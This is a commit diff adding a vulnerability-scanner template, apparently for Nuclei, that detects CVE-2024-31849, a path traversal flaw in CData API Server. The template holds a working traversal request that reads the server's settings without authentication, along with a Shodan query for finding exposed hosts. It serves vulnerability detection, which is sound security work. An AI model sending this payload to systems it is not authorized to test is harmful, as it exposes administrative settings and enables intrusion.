commit
f9cfa5eb0a
|
@ -0,0 +1,50 @@
|
||||||
|
id: CVE-2024-31849
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CData API Server < 23.4.8844 - Path Traversal
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
|
||||||
|
reference:
|
||||||
|
- https://www.tenable.com/security/research/tra-2024-09
|
||||||
|
- https://www.cdata.com/kb/entries/jetty-cve-0324.rst
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-31849
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2024-31849
|
||||||
|
cwe-id: CWE-22
|
||||||
|
epss-score: 0.00044
|
||||||
|
epss-percentile: 0.09652
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: title:"CData"
|
||||||
|
tags: cve,cve2024,cdata,lfi
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Referer: {{RootURL}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"items":[{'
|
||||||
|
- ':"true"'
|
||||||
|
- 'notifyemail'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'application/json'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue